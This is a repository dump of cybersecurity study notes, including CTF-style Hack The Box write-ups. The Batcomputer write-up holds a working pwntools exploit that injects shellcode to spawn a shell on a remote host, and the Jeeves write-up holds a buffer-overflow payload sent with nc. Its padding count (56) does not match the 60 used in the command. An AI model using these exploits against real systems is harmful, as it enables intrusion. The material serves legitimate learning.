Repository tree (nickapic/Cyber-Security-Knowledge):

```text
.
├── .gitignore
├── Day 1 - Linux Stack Smashing
│   ├── Images
│   │   └── ghidra.png
│   ├── README.md
│   ├── batcomputer.md
│   └── jeeves.md
├── Day 10 - Report Writing
│   └── README.md
├── Day 11 - SysInternals
│   └── README.md
├── Day 12 - Core Windows Processes
│   └── README.md
├── Day 13 - Event Logs
│   └── README.md
├── Day 14 - Yara
│   └── README.md
├── Day 15 - ROP Attacks Basics
│   ├── Images
│   │   ├── functions.png
│   │   ├── overwritten.png
│   │   ├── patternsearch.png
│   │   ├── reg.png
│   │   ├── run.png
│   │   └── winner.png
│   └── README.md
├── Day 16 - OAuth Basics
│   └── README.md
├── Day 17 - Linux Privelege Escalation
│   └── README.md
├── Day 2 - More about Stacks and Linux BOF
│   ├── Images
│   │   ├── ghex.png
│   │   ├── intialize.png
│   │   └── main.png
│   ├── README.md
│   └── optimistic.md
├── Day 20- File Transfers
│   └── README.md
├── Day 21 - Pwntools Usage Basics
│   └── README.md
├── Day 22 - GraphQL Basic Techniques
│   └── README.md
├── Day 23 - Linux Command Line and Bash
│   ├── README.md
│   └── testfiles
│       ├── awk.txt
│       ├── grep.txt
│       ├── newtr.txt
│       ├── sort.txt
│       ├── tr.txt
│       └── uniq.txt
├── Day 24 - Powershell Basics
│   └── README.md
├── Day 25 - x64 Linux Binary Exploitation (1)
│   └── README.md
├── Day 26 - .NET Executing Reversing
│   ├── Images
│   │   ├── flag.png
│   │   ├── importing.png
│   │   ├── main1.png
│   │   ├── main2.png
│   │   └── online.png
│   └── README.md
├── Day 27 - Docker
│   └── README.md
├── Day 28 - Mitre
│   ├── Attack.png
│   └── README.md
├── Day 29 - File Inclusion
│   ├── Pasted image 20211011233528.png
│   ├── Pasted image 20211011233544.png
│   └── README.md
├── Day 3 - Simple Domain Ennumeration in AD
│   └── README.md
├── Day 4 - Lateral Movement and PrivEsc
│   └── README.md
├── Day 5 - XML External Entity Injection
│   └── README.md
├── Day 6 - API Basic Techniques
│   └── README.md
├── Day 7 - Android Hacking Basic Techniques
│   └── README.md
├── Day 8 - Voltatlity Forensics
│   └── README.md
├── Day 9 - Assembly Language Basics
│   └── README.md
└── README.md
```

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
~/.obisidian
--------------------------------------------------------------------------------
/Day 1 - Linux Stack Smashing/Images/ghidra.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 1 - Linux Stack Smashing/Images/ghidra.png

--------------------------------------------------------------------------------
/Day 1 - Linux Stack Smashing/README.md:
--------------------------------------------------------------------------------
### GDB Introduction

Resources used:

- INE (www.ine.com), Exploit Development Student course: https://ine.com/pages/cybersecurity
- PinkDraconian on YouTube: https://www.youtube.com/watch?v=W5dVsa3__N4&t
- Hack The Box Academy: https://academy.hackthebox.eu/module/31

GDB is the tool we use to view a compiled binary at the assembly level.

We can load a binary into gdb like this:

```bash
gdb -q bow32
```

and then disassemble the main function with:

```bash
disassemble main
```

I personally prefer Intel syntax; to set it as the default we can use:

```bash
echo 'set disassembly-flavor intel' > ~/.gdbinit
```

Registers are the main working parts of the CPU: almost every register is a small storage location where data is held temporarily while it is being worked on.

Registers are divided into general registers, control registers and segment registers. The ones we need most here are the general registers.

GDB also has a lot of plugins that improve the visibility it gives us, and from my research GDB PEDA is a very popular one, so I will be using that.
Their GitHub can be found here: https://github.com/longld/peda
The installation goes like so:

```bash
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
```

We can also start GDB in quiet mode, which skips the initial banner, with `-q`; `-p` attaches it to a running process, `-h` prints its help menu, and so on.

Some useful functions in GDB are:

1. disas / disassemble [function name]: disassemble the function with that name.
2. break [function name] / break *0xAddress: set a breakpoint at the entry of a function or at a specific address.
3. print [name/register/variable]: print the value of a function, register or variable.
4. info [name]: display information about the thing you name; for example `info registers` prints all registers.
5. step: step to the next source line in the code.
6. stepi: step exactly one machine instruction.
7. x (examine): display memory at various locations in various formats.

```bash
x/[number of units][data type][location name]
```
8. To display n words starting at the address held in a register (here the instruction pointer) we can use:

```bash
# In case n is 10
x/10w $eip
```

9. To display n instructions starting from the address held in a certain register:
```bash
# in case of n = 20
x/20i $eip
```
To do a basic binary-exploitation check with gdb-peda we can use the following sequence:
```bash
gdb
r # To run the binary
# Let's get a payload with gdb-peda; we can use pattern_create
pattern_create 150 # We can now run the program with this output as input; the first 4 letters shown at RSP/ESP are what we have to analyse
pattern_offset # and we will get the offset
```

Other useful tools: readelf, ltrace, strace, strings and objdump.

1. ltrace and strace trace the library calls and system calls, respectively, performed by the binary.
2. readelf displays information about the executable file itself.
3. objdump displays information about object files; it can also disassemble Linux executables.
4. strings extracts all the readable strings from a binary, which is useful if something is, let's say, hardcoded in it.

Another great way to analyse a binary is Ghidra. You can also use r2, but Ghidra decompiles the code into C, which makes it easier to understand.
A great resource to learn this is https://tryhackme.com/room/ccghidra, and we can also use the pwntools library to help us with the exploitation process.

--------------------------------------------------------------------------------
/Day 1 - Linux Stack Smashing/batcomputer.md:
--------------------------------------------------------------------------------
### Batcomputer

Main resource used: https://www.youtube.com/watch?v=3Snd6A_duSQ (PinkDraconian on YouTube)

GDB output:
```bash
gdb-peda$ r
Starting program: /home/nickapic/htb/challenges/batcomputer/batcomputer
Welcome to your BatComputer, Batman. What would you like to do?
1. Track Joker
2. Chase Joker
> 2
Ok. Let's do this. Enter the password: b4tp@$$w0rd!
Access Granted.
Enter the navigation commands: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabj
Roger that!
Welcome to your BatComputer, Batman. What would you like to do?
1. Track Joker
2. Chase Joker
> 3
Too bad, now who's gonna save Gotham? Alfred?

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7ed2f33 (<__GI___libc_write+19>: cmp rax,0xfffffffffffff000)
RDX: 0x0
RSI: 0x7ffff7fa3723 --> 0xfa5670000000000a
RDI: 0x7ffff7fa5670 --> 0x0
RBP: 0x6161617561616174 ('taaauaaa')
RSP: 0x7fffffffd938 ("vaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabj^%U\260PUUUU")
RIP: 0x55555555531f (ret)
R8 : 0x2e ('.')
R9 : 0x0
R10: 0x7ffff7f55ac0 --> 0x100000000
R11: 0x246
R12: 0x5555555550b0 (endbr64)
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)

```

Here the RIP would be overwritten by the first 4 characters shown to us at RSP, which in our case is "vaaa".

This is the command prompt I used to create the cyclic variables and check what the offset is:

```python
>>> import pwn
>>> pwn.cyclic(137)
b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabj'
>>> pwn.cyclic_find('vaaa')
84
```

Solution:
```python
from pwn import *

def main():
    context(os='linux', arch='amd64')
    io = remote('remote ip', remote port)  # Connecting to a remote IP and port
    # First step is to enumerate
    password = 'b4tp@$$w0rd!'
    # Password we got from Ghidra
    return_address = 84  # GDB gave us the offset: the number of bytes written before the saved return address is overwritten

    # Get the stack address

    io.sendlineafter('> ', '1')  # The prompt starts with "> " and asks for our input
    stack_address = io.recvline().strip().split()[-1]  # The last item of this output line is the address
    stack_address = ''.join([chr(int(stack_address[i:i+2], 16)) for i in range(2, len(stack_address), 2)])  # Turn the hex string 0x12345678 into the bytes \x12\x34\x56\x78
    # Make sure the address is 8 bytes
    stack_address = stack_address.rjust(8, '\x00')
    stack_address = u64(stack_address, endian='big')  # Unpack as big endian because we built the bytes most-significant first; as an integer it is easy to do arithmetic on, and p64 below packs it little endian (least significant byte first) as the CPU expects
    log.success(f'Gottem: {p64(stack_address)}')  # Just logging to see if all is alright

    # Step 2: do the buffer overflow
    io.sendlineafter('> ', '2')
    io.sendlineafter('password: ', password)
    shellcode = asm(shellcraft.popad() + shellcraft.sh())
    padding = b'a' * (return_address - len(shellcode))
    payload = shellcode + padding + p64(stack_address)
    io.sendlineafter('commands: ', payload)
    # To trigger the fault we need to return, so choosing 3 takes the segfault path
    io.sendlineafter('> ', '3')
    io.interactive()

main()
```


--------------------------------------------------------------------------------
/Day 1 - Linux Stack Smashing/jeeves.md:
--------------------------------------------------------------------------------
### Jeeves: Hack The Box Challenge, Intro to Binary Exploitation

Main resource used: https://www.youtube.com/watch?v=W5dVsa3__N4&t

Let's first check what the binary is doing. It seems to be a very simple binary that just prints the following output, and in the middle it asks for our
name and then displays it with a greeting, like so:

```bash
Hello, good sir!
May I have your name? a
Hello a, hope you have a good day!
```

Now let's analyse the file in Ghidra to see what it is actually doing.

![Ghidra Screenshot](ghidra.png)

It seems we need to overwrite the value of the variable I have renamed "variable to overwrite". The program uses the gets function, which is vulnerable to buffer overflow, so we can try to overwrite that value with a buffer overflow. But first, let's see whether we can overwrite anything at all. Loading the application into gdb and running it with 100 characters, I get a segmentation fault and I can see that I can overwrite the variable:

```bash
gdb-peda$ r
Starting program: /home/nickapic/htb/challenges/jeeves
Hello, good sir!
May I have your name? aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Hello aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, hope you have a good day!

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x0
RDX: 0x0
RSI: 0x5555555592a0 ("Hello ", 'a' , ", hope you have a good day!\n")
RDI: 0x7ffff7fa5670 --> 0x0
RBP: 0x6161616161616161 ('aaaaaaaa')
RSP: 0x7fffffffded8 ('a' )
RIP: 0x5555555552ae (: ret)
R8 : 0xffffffff
R9 : 0x86
R10: 0x7fffffffde90 ('a' )
R11: 0x246
R12: 0x555555555100 (<_start>: endbr64)
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x10212 (carry parity ADJUST zero sign trap INTERRUPT direction overflow)
```

Now let's calculate how many bytes we have to go past to reach the variable we want to overwrite.
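The batcomputer writeup found its offset with `pwn.cyclic` / `pwn.cyclic_find` instead of counting the layout by hand. As an added example (not code from this repository), here is what those two calls do under the hood, using pwntools' default alphabet and 4-byte window so the output matches the pattern above; it also accepts a raw register value such as the RBP shown in the batcomputer crash:

```python
# Added example, not code from the repository: a from-scratch version of what
# gdb-peda's pattern_create / pattern_offset and pwntools' cyclic / cyclic_find
# do.  Same alphabet (a-z) and 4-byte window as the pwntools defaults, so the
# output matches the pattern used in the batcomputer writeup.
from itertools import islice
import string

ALPHABET = string.ascii_lowercase  # pwntools' default cyclic alphabet
N = 4                              # pwntools' default cyclic_size


def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the de Bruijn sequence B(k, n) one character at a time: every
    length-n string over the alphabet appears exactly once as a window, so a
    4-byte window read out of a register pins down a unique offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length):
    """Like pwn.cyclic(length): the first `length` bytes of the pattern."""
    return "".join(islice(de_bruijn(), length)).encode()


def cyclic_find(window):
    """Like pwn.cyclic_find(): offset of a 4-byte window within the pattern.

    `window` may be the text peda prints (b'vaaa' or 'vaaa') or a raw
    register value such as RBP = 0x6161617561616174, whose little-endian
    bytes spell 'taaauaaa'; only the first 4 bytes are used.  Returns -1 if
    the window is not part of the pattern (e.g. the crash was not caused by
    our input at all)."""
    if isinstance(window, int):
        window = window.to_bytes(8, "little")
    elif isinstance(window, str):
        window = window.encode()
    window = window[:N]
    recent = bytearray()               # sliding window of the last N chars
    for idx, ch in enumerate(de_bruijn()):
        recent.append(ord(ch))
        if len(recent) > N:
            del recent[0]
        if bytes(recent) == window:
            return idx - N + 1         # offset of the window's first byte
    return -1


if __name__ == "__main__":
    print(cyclic(137))
    print(cyclic_find(b"vaaa"))              # offset reported in the writeup
    print(cyclic_find(0x6161617561616174))   # the RBP value from the crash
```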
We see there is a 44-byte buffer, then an integer, which is 4 bytes, then a pointer, which is normally 8 bytes, and then the int variable we have to overwrite, which is 4 bytes; so we also add another 4 bytes to this calculation to reach `0x1337bab3`.
So 44+4+8+4 = 56 bytes of padding and then the address. We can also see that this is little endian and 64-bit, so we can use something like the pwn library to pack our 64-bit integer.

Information about this: https://docs.pwntools.com/en/stable/util/packing.html?highlight=p64#pwnlib.util.packing.p64

```bash
python2 -c "import pwn; print('a'*60 + pwn.p64(0x1337bab3))" > input.txt
```

and then to get the flag we can use:

```bash
nc 139.59.162.195 30942 < input.txt
```

--------------------------------------------------------------------------------
/Day 10 - Report Writing/README.md:
--------------------------------------------------------------------------------

### Report Writing
For report writing we first have to choose a template. I chose the template from this repository:

https://github.com/noraj/OSCP-Exam-Report-Template-Markdown

This lets us write the report in Markdown. To set it up, I highly recommend watching the video from John Hammond, who explains note taking and using this template very nicely:

https://www.youtube.com/watch?v=MQGozZzHUwQ&t=411s

And now let's look at the composition of a report:

1. Introduction
2. Executive Summary
3. Reporting Summary (Technical)
4.
Remediation Summary

### Introduction

For the introduction you can take examples from a few templates and edit them. This section covers a summary of the task you were given, the confidentiality statement (who has access to this document), a disclaimer, and then an assessment overview where we define the dates of the assessment and the activities in very general form: planning, discovery, attack, reporting.

Next in this section we define the criteria by which we evaluate the system. For example, if you give a risk value for each vulnerability, write how you evaluate it: what is low risk, what is medium risk, and so on, and how you classify, i.e. whether you use a generic Low → Medium → High scale or something else. You can also use a standard like CVE scores to define your risk values, and state that here.

For an example of this I would highly recommend checking out the sample report in this repository from The Cyber Mentor; that report will also give you a very good idea of what a report should consist of.

Then a small summary of the scope we were allocated and our task should also be included, in a section called Scope.
Resources:

Template → https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report

### Executive Summary

This part is where we summarise the whole assessment for the higher-ups. They don't really care about the specifics of the exploits; they want to know, for example, what the overall security looks like, what it would cost to fix everything, and the number of vulnerabilities (we will have graphs for that). Let's break this down into sections:

1. Introduction and summary of the report: a short summary of the time period over which the assessment was carried out, whether we were able to compromise the machines, and whether we completed the targets that were set in the rules of engagement.
2. Attack summary: a basic summary of the attack and how we managed to compromise the machines, kept at a simple level, as we don't want to put too many details in front of the executives; the more detailed and thorough account goes in the vulnerability assessment.
3.
Vulnerabilities found graph: here we give the employers a graph summarising the vulnerabilities in each category, like this:

![Vulnerabilities found graph](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/15c8c253-0f46-4321-82b0-0a64813927a9/Untitled.png)

Resources that can be used to make graphs:

https://www.rapidtables.com/tools/bar-graph.html

https://spark.adobe.com/make/charts/bar-graph/

https://www.visme.co/graph-maker/

4. Security strengths and weaknesses: in these two sections we summarise the security strengths of the organisation, e.g. if they caught one of your attacks, or there was a firewall in place that made the process hard, you can compliment them and mention it here; and in the weaknesses it could be that nobody in the company noticed an attack being carried out, there was no two-factor authentication in place, etc.

You can also take a different approach and grade your client's security on a scale, maybe 1-10 or a scale you define.

### Vulnerability Report

This is the report where we go into more technical detail about all the vulnerabilities we gathered. We try to divide this section by hosts and network segments of the organisation as well, so first we organise and write up all the vulnerabilities per machine, each in its own section.
So let's say, for example, we have it like so:

In our example case let's assume we have two network segments (CORP, ACME.LOCAL) and in those we have two machines (Machine 1 and Machine 2); then we can lay it out like this:

**CORP Network**

General idea of how you got into the network

Machine 1:

Vulnerabilities in this system.

**ACME.LOCAL**

Machine 2:

Vulnerabilities in this system.

Now let's see how we can describe these vulnerabilities and give specifics about them. For example, let's choose:

Input validation error in the login form which causes SQLi

To describe this it would be great to provide as much technical information about the vulnerability as possible, including where it is caused, and if you have access to the source code you can point out the errors directly in the source.

For our example:

---

**SQLi attack due to poor input validation in login form →**

This error happens because no sanitisation is done on the server side, or even on the client side, which makes the login form a place where malicious actors can submit malicious payloads, dump the organisation's database and obtain sensitive information.

Risk: possible sensitive data disclosure due to a SQL injection attack, which can lead to GDPR fines and a huge financial impact on the organisation.
Impact Level: Very High

Likelihood: Very Likely

Vulnerable Piece of Code:

/* Here you can show the vulnerable code if you have access to the source code */

---

### Remediation Summary

This is where you give an overall summary of the actions needed to fix the system, starting with the general ones: if there is a weak password policy in place, no antivirus in place, etc., they can be addressed first. Then we go into the fixes for each and every vulnerability in the system; I personally go over them in the same order I defined the sections in the Vulnerability section. If you compromised something using a Metasploit module you can look up patches for that exploit or module, or you can search the name of the vulnerability and look for patches from the vendor.

If the vulnerability is more about web exploitation you can use the OWASP guides to make suggestions for the organisation and tell them to treat this as a guide for development to avoid mistakes; also, if it is something well known like Shellshock you can look up patches and so on, and in some cases you can provide improved code snippets for the vulnerable piece of code in the system. The same can be done for buffer overflows and for fixing the vulnerable/defective part of the web app or the application in general.

You can also suggest solutions/applications that help with such issues; for example, in the case of a Node.js application you can recommend some packages that help fix issues in the web app.

In this stage you can also provide an estimated budget the company would need to fix these issues.
--------------------------------------------------------------------------------
/Day 11 - SysInternals/README.md:
--------------------------------------------------------------------------------
### Microsoft Sysinternals

Main resource used: https://tryhackme.com/room/btsysinternalssg

Sysinternals is a set of Windows-based tools that cover the following categories of utilities:

1. File and Disk Utilities
2. Networking Utilities
3. Process Utilities
4. Security Utilities
5. System Utilities
6. Miscellaneous

These tools are used a lot by system admins, and also by red teamers to blend in quietly while doing malicious activities.

To download Sysinternals we can use:

https://docs.microsoft.com/en-us/sysinternals/downloads/ : to download only a few specific tools.
If you want the whole suite use this: https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

We can also use Sysinternals Live, which is an alternative to downloading all the tools: they are run directly from the online share.

```
\\live.sysinternals.com\tools\procmon.exe
```

**For this, make sure the WebClient (WebDAV) service is running. Network Discovery also needs to be enabled; this setting can be enabled in the Network and Sharing Center.**


##### File and Disk Utilities

Sigcheck: shows the file version number, timestamp information and digital signature details. It can also check a file's status on VirusTotal.

Syntax:
```
sigcheck -u -e C:\Windows\System32
# -u : if VirusTotal checking is enabled, show only files that are unknown to VirusTotal or have a non-zero detection
# -e : scan executable images only
```

Streams: this tool helps us find alternate data streams in files and allows reading and writing those streams, which exist because of the NTFS file system.
Alternate Data Streams (ADS) are a file attribute specific to Windows NTFS (New Technology File System). Every file has at least one data stream ($DATA), and ADS allows a file to contain more than one stream of data.
This is often used by malware to hide data, but it is not always malicious.

```
streams filepath # to reveal streams
notepad filepath:streamname # to open notepad with the stream data
```

SDelete: this allows us to securely delete one or more files and/or directories, or to clean the free space on a logical disk.

It implements the DOD 5220.22-M (Department of Defense clearing and sanitizing) protocol.

Other good File and Disk Utilities: https://docs.microsoft.com/en-us/sysinternals/downloads/file-and-disk-utilities

##### Networking Utilities

TCPView: this shows us all TCP and UDP endpoints on our system, including the local and remote addresses and the state of TCP connections. It provides a more informative and conveniently presented subset of the Netstat program that ships with Windows; a command-line version of it is TCPVcon.

##### Process Utilities

Autoruns: this has the most comprehensive knowledge of auto-starting locations of any startup monitor and shows what starts up when you boot. It is a very powerful tool for searching for malicious entries created on the local machine for persistence.
```
autoruns
```

Procdump: this is for monitoring an application for CPU spikes and generating crash dumps during a spike, to determine the cause of the spike. You can also create dumps by right-clicking on a process.

Process Monitor: an advanced monitoring tool that shows real-time file system, registry and process/thread activity. It is very powerful and can be very useful for system troubleshooting and malware hunting.

```
procmon
```

It captures events that happen in the OS (you can turn capture on and off in the File tab), and there are a lot of them, so to use it efficiently you have to use filters, which is fairly easy.
A good resource for it: https://adamtheautomator.com/procmon/

PsExec: this is a telnet replacement that lets you execute processes on other systems, basically like a cmd shell would. It is used a lot in red-team assessments as well.

##### Security Utilities

Sysmon: this is a Windows system service and device driver that remains resident across system reboots to monitor and log system activity to the Windows event log.

##### System Information

WinObj: this tool uses the native Windows API to access and display information on the NT Object Manager's namespace.

Session 0 is the OS session, Session 1 is the user session.
```
winobj
```

##### Miscellaneous

BgInfo: a weird tool that displays relevant information about a Windows computer on the desktop background.

RegJump: a command-line applet that takes a registry path and makes Regedit open at that path.

--------------------------------------------------------------------------------
/Day 12 - Core Windows Processes/README.md:
--------------------------------------------------------------------------------
### Core Windows Processes

Resources used: https://tryhackme.com/room/btwindowsinternals

Learning about this helps us understand normal behaviour within a Windows OS and detect when issues or malicious activity happen.

Task Manager: this is the main GUI-based tool that shows what is running on the Windows system and its resource usage; it can also be used to kill processes.

You can right-click on the column headers (Name, Status, CPU, and so on) to show more fields and tabs.

- **Type** - Each process falls into 1 of 3 categories (Apps, Background process, or Windows process).
- **Publisher** - Think of this column as the name of the author of the program/file.
- **PID** - This is known as the process identifier number. Windows assigns a unique process identifier each time a program starts. If the same program has multiple processes running, each will have its own unique process identifier (PID).
- **Process name** - This is the file name of the process. In the above image, the file name for Task Manager is Taskmgr.exe.
- **Command line** - The full command used to launch the process.
- **CPU** - The amount of CPU (processing power) used by the process.
- **Memory** - The amount of physical working memory utilized by the process.

Then you can also go to the Details tab, which has a lot more detail about the processes; a good way to tell in the Details tab whether something is off is to check the image path name and the command line used to launch it.

A parent-child process view is not a feature of Task Manager, but we can use tools like Process Hacker and Process Explorer for that. Command-line equivalents:
```
tasklist
Get-Process
ps
wmic
```

##### System

This has PID 4 and is the home of threads that run only in kernel mode (kernel-mode system threads). System threads have all the attributes and contexts of regular user-mode threads (such as a hardware context, priority, and so on) but differ in that they run only in kernel mode, executing code loaded in system space, whether that is in Ntoskrnl.exe or in any other loaded device driver.
It is run from the image path `C:\Windows\system32\ntoskrnl.exe` (NT OS Kernel).


###### smss.exe

This process is the Windows Session Manager, which is responsible for creating new sessions. It is the first user-mode process started by the kernel. Smss.exe starts csrss.exe (Windows subsystem) and wininit.exe in Session 0, an isolated Windows session for the operating system, and csrss.exe and winlogon.exe for Session 1, which is the user session. SMSS is also responsible for creating environment variables and virtual memory paging files, and it starts winlogon.exe.

Normal configuration:

**Image Path**: %SystemRoot%\\System32\\smss.exe

**Parent Process**: System

**Number of Instances**: One master instance and a child instance per session. The child instance exits after creating the session.

**User Account**: Local System

**Start Time**: Within seconds of boot time for the master instance

###### csrss.exe

This is the Client Server Runtime Process, the user-mode side of the Windows subsystem. It is always running and critical to the OS. It is responsible for the Win32 console window and for process/thread creation and deletion. Each instance loads csrsrv.dll, basesrv.dll and winsrv.dll.

Normal configuration:
**Image Path**: %SystemRoot%\\System32\\csrss.exe

**Parent Process**: Created by an instance of smss.exe

**Number of Instances**: Two or more

**User Account**: Local System

**Start Time**: Within seconds of boot time for the first 2 instances (for Session 0 and 1). Start times for additional instances occur as new sessions are created, although often only Sessions 0 and 1 are created.

###### Wininit.exe

This is responsible for launching services.exe, lsass.exe and lsaiso.exe within Session 0. It is a very critical process. lsaiso.exe is a process associated with Credential Guard and Key Guard.
You will only see this process if Credential Guard is enabled.

**Image Path**: `%SystemRoot%\System32\wininit.exe`
**Parent Process**: Created by an instance of smss.exe
**Number of Instances**: One
**User Account**: Local System
**Start Time**: Within seconds of boot time

###### Services.exe
This is the Service Control Manager (SCM). It is responsible for handling system services: loading services, starting/stopping them, and maintaining the services database that sc.exe talks to.
Information about services is stored in `HKLM\System\CurrentControlSet\Services`.

It is the parent process of svchost.exe, spoolsv.exe, msmpeng.exe and dllhost.exe, to name a few.

Normal configuration:
**Image Path**: `%SystemRoot%\System32\services.exe`
**Parent Process**: wininit.exe
**Number of Instances**: One
**User Account**: Local System
**Start Time**: Within seconds of boot time

###### lsass.exe

This process is responsible for enforcing the security policy on the system. It handles password changes, verifies logins and creates access tokens. It creates security tokens for SAM (Security Account Manager), AD (Active Directory), and NETLOGON.

https://yungchou.wordpress.com/2016/03/14/an-introduction-of-windows-10-credential-guard/

Normal configuration:
**Image Path**: `%SystemRoot%\System32\lsass.exe`
**Parent Process**: wininit.exe
**Number of Instances**: One
**User Account**: Local System
**Start Time**: Within seconds of boot time

###### winlogon.exe

This is responsible for the Secure Attention Sequence (SAS), the Ctrl+Alt+Delete key combination users press before entering their username and password. It is responsible for loading the user profile, and also for locking the screen and running the user's screensaver, among other functions.
Normal configuration:
**Image Path**: `%SystemRoot%\System32\winlogon.exe`
**Parent Process**: Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name.
**Number of Instances**: One or more
**User Account**: Local System
**Start Time**: Within seconds of boot time for the first instance (for Session 1). Additional instances occur as new sessions are created, typically through Remote Desktop or Fast User Switching logons.

###### Explorer.exe

This is the process that gives us access to our folders and files. It also provides other functionality such as the Start menu and the taskbar.

Normal configuration:
**Image Path**: `%SystemRoot%\explorer.exe`
**Parent Process**: Created by userinit.exe, which then exits
**Number of Instances**: One or more per interactively logged-in user
**User Account**: Logged-in user(s)
**Start Time**: First instance when the first interactive user logon session begins

###### svchost.exe

This is responsible for hosting and managing Windows services. Services running in this process are implemented as DLLs. The DLL that implements a service is recorded in the registry, in the `ServiceDLL` value under the service's `Parameters` subkey. The full path is `HKLM\SYSTEM\CurrentControlSet\Services\SERVICE NAME\Parameters`. Here it had PID 748.

Normal configuration:
**Image Path**: `%SystemRoot%\System32\svchost.exe`
**Parent Process**: services.exe
**Number of Instances**: Many
**User Account**: Varies (SYSTEM, Network Service, Local Service) depending on the svchost.exe instance. In Windows 10 some instances can run as the logged-in user.
**Start Time**: Typically within seconds of boot time.
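The baselines listed for the core processes (image path, parent process, user account, number of instances) checked programmatically over a process snapshot. This is an added example, not part of the original notes: the snapshot is constructed by hand, `%SystemRoot%` is assumed to be `C:\Windows`, and a parent that is missing from the snapshot is only accepted where the notes say the parent normally exits (smss.exe, userinit.exe).

```python
"""Check a process snapshot against the expected image path, parent and
user of the core Windows processes described above.

Added example (not from the original notes): the snapshot below is
constructed by hand, and %SystemRoot% is assumed to be C:\\Windows."""
from dataclasses import dataclass

SYSTEM_ROOT = r"C:\Windows"   # assumed value of %SystemRoot%


@dataclass
class Proc:
    name: str
    pid: int
    ppid: int
    path: str
    user: str


# name -> (expected image path, allowed parent names, expected user).
# None in the parent set means "parent normally exited" (smss.exe / userinit.exe),
# so a parent that is no longer in the snapshot is not an alarm.
# None as the user means it varies and is not checked.
BASELINE = {
    "smss.exe":     (r"%SystemRoot%\System32\smss.exe",     {"system"},             "local system"),
    "csrss.exe":    (r"%SystemRoot%\System32\csrss.exe",    {"smss.exe", None},     "local system"),
    "wininit.exe":  (r"%SystemRoot%\System32\wininit.exe",  {"smss.exe", None},     "local system"),
    "services.exe": (r"%SystemRoot%\System32\services.exe", {"wininit.exe"},        "local system"),
    "lsass.exe":    (r"%SystemRoot%\System32\lsass.exe",    {"wininit.exe"},        "local system"),
    "winlogon.exe": (r"%SystemRoot%\System32\winlogon.exe", {"smss.exe", None},     "local system"),
    "explorer.exe": (r"%SystemRoot%\explorer.exe",          {"userinit.exe", None}, None),
    "svchost.exe":  (r"%SystemRoot%\System32\svchost.exe",  {"services.exe"},       None),
}
SINGLE_INSTANCE = ("wininit.exe", "services.exe", "lsass.exe")   # "Number of Instances: One"


def check_snapshot(procs):
    """Return a list of findings (strings); an empty list means nothing deviates."""
    by_pid = {p.pid: p for p in procs}
    counts = {}
    findings = []
    for p in procs:
        name = p.name.lower()
        counts[name] = counts.get(name, 0) + 1
        if name not in BASELINE:
            continue
        exp_path, exp_parents, exp_user = BASELINE[name]
        exp_path = exp_path.replace("%SystemRoot%", SYSTEM_ROOT).lower()
        if p.path.lower() != exp_path:
            findings.append(f"{p.name} (pid {p.pid}): unexpected image path {p.path}")
        parent = by_pid.get(p.ppid)
        parent_name = parent.name.lower() if parent else None
        if parent_name not in exp_parents:
            shown = parent.name if parent else f"pid {p.ppid} (not in snapshot)"
            findings.append(f"{p.name} (pid {p.pid}): unexpected parent {shown}")
        if exp_user is not None and p.user.lower() != exp_user:
            findings.append(f"{p.name} (pid {p.pid}): unexpected user {p.user}")
    for name in SINGLE_INSTANCE:
        if counts.get(name, 0) > 1:
            findings.append(f"{name}: {counts[name]} instances, expected one")
    return findings


# Constructed snapshot: a normal boot-time process tree plus two anomalies
# (an svchost.exe started by explorer.exe from a user profile directory, and
# a second lsass.exe running as the logged-in user).
SAMPLE = [
    Proc("System",       4,    0,    r"C:\Windows\system32\ntoskrnl.exe", "Local System"),
    Proc("smss.exe",     332,  4,    r"C:\Windows\System32\smss.exe",     "Local System"),
    Proc("csrss.exe",    424,  412,  r"C:\Windows\System32\csrss.exe",    "Local System"),
    Proc("wininit.exe",  500,  412,  r"C:\Windows\System32\wininit.exe",  "Local System"),
    Proc("services.exe", 596,  500,  r"C:\Windows\System32\services.exe", "Local System"),
    Proc("lsass.exe",    612,  500,  r"C:\Windows\System32\lsass.exe",    "Local System"),
    Proc("winlogon.exe", 560,  508,  r"C:\Windows\System32\winlogon.exe", "Local System"),
    Proc("svchost.exe",  748,  596,  r"C:\Windows\System32\svchost.exe",  "Network Service"),
    Proc("explorer.exe", 3120, 3088, r"C:\Windows\explorer.exe",          r"DESKTOP\alice"),
    Proc("svchost.exe",  4711, 3120, r"C:\Users\alice\AppData\Local\Temp\svchost.exe", r"DESKTOP\alice"),
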